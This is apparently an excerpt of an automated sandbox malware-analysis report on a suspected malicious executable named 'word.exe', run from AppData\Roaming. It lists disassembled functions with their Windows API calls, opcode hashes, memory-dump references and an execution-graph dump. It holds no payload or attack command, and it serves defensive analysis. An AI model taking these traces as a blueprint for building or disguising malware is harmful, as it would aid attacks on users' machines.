                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: CapsCreateDeviceFontIndirect
                                          • String ID:
                                          • API String ID: 3272661963-0
                                          • Opcode ID: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                          • Instruction ID: 0c2e595a2d755a053b7cc3d6c09569b1e3f8f946256c05fe5e222a6b1ed621d0
                                          • Opcode Fuzzy Hash: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                          • Instruction Fuzzy Hash: B0F0C870E48280AFE70157705F0ABAB3F64D715305F100876F251BA2E3C7B910088BAE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402BF1 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32 ref: 00402C04
                                          • GetTickCount.KERNEL32(00000000,00402DD1,00000001), ref: 00402C22
                                          • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                          • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                          • String ID:
                                          • API String ID: 2102729457-0
                                          • Opcode ID: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                                          • Instruction ID: 902fecb1894dce430947e24fe85b059bfb73d5b7bbd16117cdf5d745fa908bfb
                                          • Opcode Fuzzy Hash: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                                          • Instruction Fuzzy Hash: 37F03030A09321ABC611EF60BE4CA9E7B74F748B417118576F201B11A4CB7858818B9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404DD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00404E0A
                                          • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404E78
                                            • Part of subcall function 00403EA0: SendMessageA.USER32 ref: 00403EB2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Window$CallMessageProcSendVisible
                                          • String ID:
                                          • API String ID: 3748168415-3916222277
                                          • Opcode ID: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                          • Instruction ID: 907b3508a45335f305929b628defbf7950d0c65962cf50d158fef9db48df65ea
                                          • Opcode Fuzzy Hash: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                          • Instruction Fuzzy Hash: 3B11BF71600208BFDF21AF61DC4099B3769BF843A5F40803BF604791A2C7BC4991DFA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403556 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040352E,00403337,00000020), ref: 00403570
                                          • GlobalFree.KERNEL32(00000000), ref: 00403577
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403568
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Free$GlobalLibrary
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 1100898210-4017390910
                                          • Opcode ID: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                          • Instruction ID: e2315670824f3ca0981a6a6bf9743b5050639b1b799e450ff7e3175358b78d1c
                                          • Opcode Fuzzy Hash: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                          • Instruction Fuzzy Hash: 10E08C329010206BC6215F08FD0479A7A6C6B44B22F11413AE804772B0C7742D424A88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004056D2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\AppData\Roaming,00402CC1,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\word.exe,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 004056D8
                                          • CharPrevA.USER32(80000000,00000000), ref: 004056E6
                                          Strings
                                          • C:\Users\user\AppData\Roaming, xrefs: 004056D2
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: CharPrevlstrlen
                                          • String ID: C:\Users\user\AppData\Roaming
                                          • API String ID: 2709904686-2707566632
                                          • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                          • Instruction ID: dce4988d3f9ae1539138201c89f565164349ec5ceb08caa00e339266b5a49006
                                          • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                          • Instruction Fuzzy Hash: 7FD0A772809D701EF30363108C04B8FBA48CF12310F490862E042E6191C27C6C414BBD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004057E4 Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                          • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405804
                                          • CharNextA.USER32(00000000), ref: 00405812
                                          • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: lstrlen$CharNextlstrcmpi
                                          • String ID:
                                          • API String ID: 190613189-0
                                          • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                          • Instruction ID: 6e20b17ba46ab238fcbb7c8296b2df733f1dbfa59429a89b2dba5ca226b3377d
                                          • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                          • Instruction Fuzzy Hash: C2F02733209D51ABC202AB255C00A2F7E98EF91320B24003AF440F2180D339AC219BFB
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:5.7%
                                          Dynamic/Decrypted Code Coverage:6%
                                          Signature Coverage:2.7%
                                          Total number of Nodes:1692
                                          Total number of Limit Nodes:49
                                          execution_graph 16126 410050 16127 41005c ___scrt_is_nonwritable_in_current_image 16126->16127 16152 40e316 16127->16152 16129 410063 16130 4101b6 16129->16130 16136 41008d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 16129->16136 16192 40f709 IsProcessorFeaturePresent 16130->16192 16132 4101bd 16196 41318e 16132->16196 16138 4100ac 16136->16138 16139 41012d 16136->16139 16174 4131d8 16136->16174 16163 40f682 16139->16163 16141 410133 16167 401000 16141->16167 16147 410153 16148 41015c 16147->16148 16183 4131ba 16147->16183 16186 40e34f 16148->16186 16153 40e31f 16152->16153 16202 40f496 IsProcessorFeaturePresent 16153->16202 16157 40e330 16158 40e334 16157->16158 16212 413029 16157->16212 16158->16129 16161 40e34b 16161->16129 16479 4128a0 16163->16479 16166 40f6a8 16166->16141 16481 4011d0 16167->16481 16169 401051 _Yarn 16484 401440 16169->16484 16170 401038 16170->16169 16173 4010fb VirtualAlloc 16170->16173 16173->16169 16175 4196b4 ___scrt_is_nonwritable_in_current_image 16174->16175 16176 4131ee std::_Locinfo::_Locinfo_dtor 16174->16176 16663 41ae68 GetLastError 16175->16663 16176->16139 16181 40f6b3 GetModuleHandleW 16182 40f6bf 16181->16182 16182->16132 16182->16147 16769 4132f8 16183->16769 16187 40e35b 16186->16187 16191 40e371 16187->16191 16839 41303b 16187->16839 16189 40e369 16190 410a03 ___scrt_uninitialize_crt 7 API calls 16189->16190 16190->16191 16191->16138 16193 40f71f CallUnexpected std::bad_exception::bad_exception 16192->16193 16194 40f7ca IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16193->16194 16195 40f815 CallUnexpected 16194->16195 16195->16132 16197 4132f8 CallUnexpected 23 API calls 16196->16197 16198 4101c3 16197->16198 16199 4131a4 16198->16199 16200 4132f8 CallUnexpected 23 API calls 16199->16200 16201 4101cb 16200->16201 16203 40e32b 16202->16203 16204 4109e4 16203->16204 16221 41a936 16204->16221 16207 4109ed 16207->16157 16209 4109f5 16210 410a00 16209->16210 16235 41a972 16209->16235 16210->16157 16276 41ccf5 16212->16276 16215 410a03 16216 410a16 16215->16216 16217 410a0c 16215->16217 16216->16158 16218 419a07 ___vcrt_uninitialize_ptd 6 API calls 16217->16218 16219 410a11 16218->16219 16220 41a972 ___vcrt_uninitialize_locks DeleteCriticalSection 16219->16220 16220->16216 16223 41a93f 16221->16223 16224 41a968 16223->16224 16225 4109e9 16223->16225 16239 4220a8 16223->16239 16226 41a972 ___vcrt_uninitialize_locks DeleteCriticalSection 16224->16226 16225->16207 16227 4199d4 16225->16227 16226->16225 16257 421fb9 16227->16257 16230 4199e9 16230->16209 16233 419a04 16233->16209 16236 41a99c 16235->16236 16237 41a97d 16235->16237 16236->16207 16238 41a987 DeleteCriticalSection 16237->16238 16238->16236 16238->16238 16244 42213a 16239->16244 16242 4220e0 InitializeCriticalSectionAndSpinCount 16243 4220cb 16242->16243 16243->16223 16245 4220c2 16244->16245 16249 42215b 16244->16249 16245->16242 16245->16243 16246 4221c3 GetProcAddress 16246->16245 16248 4221d1 16246->16248 16248->16245 16249->16245 16249->16246 16250 4221b4 16249->16250 16252 4220ef LoadLibraryExW 16249->16252 16250->16246 16251 4221bc FreeLibrary 16250->16251 16251->16246 16253 422106 GetLastError 16252->16253 16254 422136 16252->16254 16253->16254 16255 422111 ___vcrt_InitializeCriticalSectionEx 16253->16255 16254->16249 16255->16254 16256 422127 LoadLibraryExW 16255->16256 16256->16249 16258 42213a ___vcrt_InitializeCriticalSectionEx 5 API calls 16257->16258 16259 421fd3 16258->16259 16260 421fec TlsAlloc 16259->16260 16261 4199de 16259->16261 16261->16230 16262 42206a 16261->16262 16263 42213a ___vcrt_InitializeCriticalSectionEx 5 API calls 16262->16263 16264 422084 16263->16264 16265 42209f TlsSetValue 16264->16265 16266 4199f7 16264->16266 16265->16266 16266->16233 16267 419a07 16266->16267 16268 419a11 16267->16268 16269 419a17 16267->16269 16271 421ff4 16268->16271 16269->16230 16272 42213a ___vcrt_InitializeCriticalSectionEx 5 API calls 16271->16272 16273 42200e 16272->16273 16274 422026 TlsFree 16273->16274 16275 42201a 16273->16275 16274->16275 16275->16269 16277 41cd05 16276->16277 16278 40e33d 16276->16278 16277->16278 16280 41c377 16277->16280 16278->16161 16278->16215 16281 41c38c ___scrt_is_nonwritable_in_current_image 16280->16281 16292 415904 EnterCriticalSection 16281->16292 16283 41c393 16293 420d2f 16283->16293 16286 41c3b1 16317 41c3d7 16286->16317 16292->16283 16294 420d3b ___scrt_is_nonwritable_in_current_image 16293->16294 16295 420d44 16294->16295 16296 420d65 16294->16296 16328 415317 16295->16328 16320 415904 EnterCriticalSection 16296->16320 16301 420d9d 16334 420dc4 16301->16334 16302 41c3a2 16302->16286 16306 41c40c GetStartupInfoW 16302->16306 16303 420d71 16303->16301 16321 420c7f 16303->16321 16307 41c3ac 16306->16307 16308 41c429 16306->16308 16312 41c4c2 16307->16312 16308->16307 16309 420d2f 27 API calls 16308->16309 16310 41c451 16309->16310 16310->16307 16311 41c481 GetFileType 16310->16311 16311->16310 16313 41c4c9 16312->16313 16314 41c50c GetStdHandle 16313->16314 16315 41c572 16313->16315 16316 41c51f GetFileType 16313->16316 16314->16313 16315->16286 16316->16313 16478 41591b LeaveCriticalSection 16317->16478 16319 41c3c2 16319->16277 16320->16303 16337 41bd43 16321->16337 16323 420c91 16327 420c9e 16323->16327 16344 41b81c 16323->16344 16326 420cf3 16326->16303 16349 41ac67 16327->16349 16382 41afbf GetLastError 16328->16382 16330 41531c 16331 415685 16330->16331 16446 41582e 16331->16446 16333 415691 16333->16302 16477 41591b LeaveCriticalSection 16334->16477 16336 420dcb 16336->16302 16338 41bd50 __Getctype 16337->16338 16339 41bd90 16338->16339 16340 41bd7b RtlAllocateHeap 16338->16340 16355 413483 16338->16355 16341 415317 __dosmaperr 13 API calls 16339->16341 16340->16338 16342 41bd8e 16340->16342 16341->16342 16342->16323 16368 41bab5 16344->16368 16347 41b856 InitializeCriticalSectionAndSpinCount 16348 41b841 16347->16348 16348->16323 16350 41ac72 HeapFree 16349->16350 16354 41ac9b __dosmaperr 16349->16354 16351 41ac87 16350->16351 16350->16354 16352 415317 __dosmaperr 12 API calls 16351->16352 16353 41ac8d GetLastError 16352->16353 16353->16354 16354->16326 16358 4134bf 16355->16358 16359 4134cb ___scrt_is_nonwritable_in_current_image 16358->16359 16364 415904 EnterCriticalSection 16359->16364 16361 4134d6 16365 413512 16361->16365 16364->16361 16366 41591b std::_Lockit::~_Lockit LeaveCriticalSection 16365->16366 16367 41348e 16366->16367 16367->16338 16369 41b838 16368->16369 16370 41bae3 16368->16370 16369->16347 16369->16348 16370->16369 16375 41b9ee 16370->16375 16373 41bafd GetProcAddress 16373->16369 16374 41bb0d std::_Locinfo::_Locinfo_dtor 16373->16374 16374->16369 16380 41b9ff ___vcrt_InitializeCriticalSectionEx 16375->16380 16376 41ba1d LoadLibraryExW 16377 41ba38 GetLastError 16376->16377 16376->16380 16377->16380 16378 41ba93 FreeLibrary 16378->16380 16379 41baaa 16379->16369 16379->16373 16380->16376 16380->16378 16380->16379 16381 41ba6b LoadLibraryExW 16380->16381 16381->16380 16383 41afd6 16382->16383 16386 41afdc 16382->16386 16405 41b720 16383->16405 16404 41afe2 SetLastError 16386->16404 16410 41b75f 16386->16410 16388 41bd43 __Getctype 12 API calls 16390 41b00a 16388->16390 16391 41b012 16390->16391 16392 41b029 16390->16392 16393 41b75f __Getctype 6 API calls 16391->16393 16394 41b75f __Getctype 6 API calls 16392->16394 16395 41b020 16393->16395 16396 41b035 16394->16396 16399 41ac67 _free 12 API calls 16395->16399 16397 41b039 16396->16397 16398 41b04a 16396->16398 16400 41b75f __Getctype 6 API calls 16397->16400 16415 41b0e0 16398->16415 16399->16404 16400->16395 16403 41ac67 _free 12 API calls 16403->16404 16404->16330 16406 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 16405->16406 16407 41b73c 16406->16407 16408 41b745 16407->16408 16409 41b757 TlsGetValue 16407->16409 16408->16386 16411 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 16410->16411 16412 41b77b 16411->16412 16413 41affa 16412->16413 16414 41b799 TlsSetValue 16412->16414 16413->16388 16413->16404 16420 41b246 16415->16420 16421 41b252 ___scrt_is_nonwritable_in_current_image 16420->16421 16434 415904 EnterCriticalSection 16421->16434 16423 41b25c 16435 41b28c 16423->16435 16426 41b298 16427 41b2a4 ___scrt_is_nonwritable_in_current_image 16426->16427 16438 415904 EnterCriticalSection 16427->16438 16429 41b2ae 16439 41b095 16429->16439 16431 41b2c6 16443 41b2e6 16431->16443 16434->16423 16436 41591b std::_Lockit::~_Lockit LeaveCriticalSection 16435->16436 16437 41b14e 16436->16437 16437->16426 16438->16429 16440 41b0cb __Getctype 16439->16440 16441 41b0a4 __Getctype 16439->16441 16440->16431 16441->16440 16442 41ec40 __Getctype 14 API calls 16441->16442 16442->16440 16444 41591b std::_Lockit::~_Lockit LeaveCriticalSection 16443->16444 16445 41b055 16444->16445 16445->16403 16447 41afbf __dosmaperr 14 API calls 16446->16447 16448 415839 16447->16448 16450 415847 16448->16450 16456 4156b2 IsProcessorFeaturePresent 16448->16456 16450->16333 16451 41b81c ___std_exception_copy 6 API calls 16452 415891 16451->16452 16452->16451 16453 4158c6 16452->16453 16454 4158c2 16452->16454 16460 4158d3 16453->16460 16454->16333 16457 4156be 16456->16457 16464 4156e6 16457->16464 16461 4158ff 16460->16461 16462 4158e0 16460->16462 16461->16454 16463 4158ea DeleteCriticalSection 16462->16463 16463->16461 16463->16463 16465 415702 CallUnexpected std::bad_exception::bad_exception 16464->16465 16466 41572e IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16465->16466 16467 4157ff CallUnexpected 16466->16467 16470 40f907 16467->16470 16469 4156d3 GetCurrentProcess TerminateProcess 16469->16452 16471 40f910 IsProcessorFeaturePresent 16470->16471 16472 40f90f 16470->16472 16474 40fe18 16471->16474 16472->16469 16475 40fefd ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16474->16475 16476 40fefb 16475->16476 16476->16469 16477->16336 16478->16319 16480 40f695 GetStartupInfoW 16479->16480 16480->16166 16489 4014d0 16481->16489 16483 4011e4 16483->16170 16561 40d9f0 16484->16561 16494 401540 16489->16494 16500 4015a0 16494->16500 16497 401570 16541 401cc0 16497->16541 16501 4015cf 16500->16501 16504 401620 16501->16504 16503 4014e4 16503->16497 16505 401634 16504->16505 16508 401710 16505->16508 16507 40166b 16507->16503 16511 4017c0 16508->16511 16510 401728 16510->16507 16516 401870 16511->16516 16517 401891 16516->16517 16518 4017d7 16516->16518 16526 401950 16517->16526 16520 401810 16518->16520 16521 401826 16520->16521 16522 40183c 16520->16522 16530 4018b0 16521->16530 16523 4017e2 16522->16523 16538 401930 16522->16538 16523->16510 16527 40195e std::_Facet_Register 16526->16527 16528 410337 CallUnexpected RaiseException 16527->16528 16529 401973 16528->16529 16531 4018d3 16530->16531 16532 4018ce 16530->16532 16534 401930 16 API calls 16531->16534 16533 401950 RaiseException 16532->16533 16533->16531 16535 4018de 16534->16535 16536 415695 27 API calls 16535->16536 16537 4018ee 16535->16537 16536->16537 16537->16523 16539 40e0c8 std::_Facet_Register 16 API calls 16538->16539 16540 401942 16539->16540 16540->16523 16542 401cef 16541->16542 16545 401d10 16542->16545 16544 4014ef 16544->16483 16546 401d24 16545->16546 16549 401d80 16546->16549 16548 401d5b 16548->16544 16552 401e00 16549->16552 16551 401d98 16551->16548 16557 401e30 16552->16557 16555 401810 29 API calls 16556 401e22 16555->16556 16556->16551 16558 401e51 16557->16558 16559 401e17 16557->16559 16560 401950 RaiseException 16558->16560 16559->16555 16560->16559 16569 40da40 16561->16569 16564 40da10 16589 40db00 16564->16589 16571 40da54 16569->16571 16570 401457 16570->16564 16571->16570 16573 40c770 16571->16573 16576 403c30 16573->16576 16575 40c794 16575->16570 16577 403c49 16576->16577 16578 403c5b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 16576->16578 16580 403c80 16577->16580 16578->16575 16581 403cc3 16580->16581 16583 403ccd 16581->16583 16584 415695 16581->16584 16583->16578 16585 41582e ___std_exception_copy 27 API calls 16584->16585 16586 4156a4 16585->16586 16587 4156b2 __Getctype 11 API calls 16586->16587 16588 4156b1 16587->16588 16595 40db40 16589->16595 16592 40db20 16630 40dda0 16592->16630 16596 40db54 16595->16596 16599 40db80 16596->16599 16600 40db97 16599->16600 16605 40dbd0 16600->16605 16608 40dbe5 16605->16608 16606 40dbae 16610 40dc50 16606->16610 16607 40dbd0 27 API calls 16607->16608 16608->16606 16608->16607 16614 40dcb0 16608->16614 16611 40dc67 16610->16611 16627 40dd70 16611->16627 16619 40dd20 16614->16619 16617 40dc50 27 API calls 16618 40dce6 16617->16618 16618->16608 16622 40dd40 16619->16622 16623 401390 27 API calls 16622->16623 16624 40dd57 16623->16624 16625 401390 27 API calls 16624->16625 16626 40dcd1 16625->16626 16626->16617 16628 403c30 27 API calls 16627->16628 16629 40da27 16628->16629 16629->16592 16631 40ddb4 16630->16631 16634 40dde0 16631->16634 16635 40ddf7 16634->16635 16640 40de30 16635->16640 16643 40de45 16640->16643 16641 40de0e 16645 40deb0 16641->16645 16642 40de30 27 API calls 16642->16643 16643->16641 16643->16642 16649 40df10 16643->16649 16646 40dec7 16645->16646 16660 40df50 16646->16660 16654 40d530 16649->16654 16652 40deb0 27 API calls 16653 40df46 16652->16653 16653->16643 16657 40d570 16654->16657 16658 401390 27 API calls 16657->16658 16659 40d541 16658->16659 16659->16652 16661 403c30 27 API calls 16660->16661 16662 4011b2 16661->16662 16662->16181 16664 41ae85 16663->16664 16665 41ae7f 16663->16665 16667 41b75f __Getctype 6 API calls 16664->16667 16688 41ae8b SetLastError 16664->16688 16666 41b720 __Getctype 6 API calls 16665->16666 16666->16664 16668 41aea3 16667->16668 16669 41bd43 __Getctype 14 API calls 16668->16669 16668->16688 16670 41aeb3 16669->16670 16672 41aed2 16670->16672 16673 41aebb 16670->16673 16678 41b75f __Getctype 6 API calls 16672->16678 16676 41b75f __Getctype 6 API calls 16673->16676 16674 4196c5 16690 415b88 16674->16690 16675 41af1f 16677 415b88 CallUnexpected 46 API calls 16675->16677 16679 41aec9 16676->16679 16680 41af24 16677->16680 16681 41aede 16678->16681 16684 41ac67 _free 14 API calls 16679->16684 16682 41aef3 16681->16682 16683 41aee2 16681->16683 16686 41b0e0 __Getctype 14 API calls 16682->16686 16685 41b75f __Getctype 6 API calls 16683->16685 16684->16688 16685->16679 16687 41aefe 16686->16687 16689 41ac67 _free 14 API calls 16687->16689 16688->16674 16688->16675 16689->16688 16699 41cdac 16690->16699 16693 415ba2 IsProcessorFeaturePresent 16696 415b8d 16693->16696 16694 4131a4 CallUnexpected 23 API calls 16694->16696 16695 4156e6 CallUnexpected 8 API calls 16695->16696 16696->16690 16696->16693 16696->16694 16696->16695 16698 4196ef 16696->16698 16702 41cdd3 16696->16702 16729 419a30 16696->16729 16743 41d030 16699->16743 16703 41cddf ___scrt_is_nonwritable_in_current_image 16702->16703 16704 41ce06 CallUnexpected 16703->16704 16705 41afbf __dosmaperr 14 API calls 16703->16705 16707 41ce0c CallUnexpected 16703->16707 16706 41ce53 16704->16706 16704->16707 16709 41ce3d 16704->16709 16705->16704 16708 415317 __dosmaperr 14 API calls 16706->16708 16712 41ce7f 16707->16712 16754 415904 EnterCriticalSection 16707->16754 16710 41ce58 16708->16710 16709->16696 16711 415685 ___std_exception_copy 27 API calls 16710->16711 16711->16709 16715 41cec1 16712->16715 16716 41cfb2 16712->16716 16726 41cef0 16712->16726 16721 41ae68 __Getctype 48 API calls 16715->16721 16715->16726 16718 41cfbd 16716->16718 16759 41591b LeaveCriticalSection 16716->16759 16720 4131a4 CallUnexpected 23 API calls 16718->16720 16722 41cfc5 16720->16722 16724 41cee5 16721->16724 16723 41ae68 __Getctype 48 API calls 16727 41cf45 16723->16727 16725 41ae68 __Getctype 48 API calls 16724->16725 16725->16726 16755 41cf5f 16726->16755 16727->16709 16728 41ae68 __Getctype 48 API calls 16727->16728 16728->16709 16730 419a39 16729->16730 16731 419a3c GetLastError 16729->16731 16730->16696 16761 42202f 16731->16761 16734 419a70 16735 419ab6 SetLastError 16734->16735 16735->16696 16736 42206a ___vcrt_FlsSetValue 6 API calls 16737 419a6a __Getctype 16736->16737 16737->16734 16738 419a92 16737->16738 16739 42206a ___vcrt_FlsSetValue 6 API calls 16737->16739 16740 42206a ___vcrt_FlsSetValue 6 API calls 16738->16740 16741 419aa6 16738->16741 16739->16738 16740->16741 16766 415be6 16741->16766 16744 41d03c ___scrt_is_nonwritable_in_current_image 16743->16744 16749 415904 EnterCriticalSection 16744->16749 16746 41d04a 16750 41d088 16746->16750 16749->16746 16753 41591b LeaveCriticalSection 16750->16753 16752 41cdd1 16752->16696 16753->16752 16754->16712 16756 41cf65 16755->16756 16758 41cf36 16755->16758 16760 41591b LeaveCriticalSection 16756->16760 16758->16709 16758->16723 16758->16727 16759->16718 